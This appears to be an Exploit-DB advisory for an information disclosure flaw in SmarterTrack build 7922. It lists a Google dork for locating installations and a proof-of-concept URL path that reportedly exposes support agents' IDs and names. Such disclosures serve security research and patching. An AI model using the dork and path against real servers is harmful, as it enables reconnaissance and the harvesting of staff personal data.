SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure

EDB-ID:

50328

CVE:

N/A




Platform:

ASPX

Date:

2021-09-24


# Exploit Title: SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure 
# Google Dork: intext:"Powered by SmarterTrack"
# Date: 23/01/2020
# Exploit Author: Andrei Manole
# Vendor Homepage: https://www.smartertools.com/
# Software Link: https://www.smartertools.com/smartertrack
# Version: TESTED ON  10.x -> 14.x and to Build 7922 (set 9, 2021)
# Tested on: Windows 10

POC:
VULNERABLE TARGET/Management/Chat/frmChatSearch.aspx
This file disclosure all agents id and first name and second name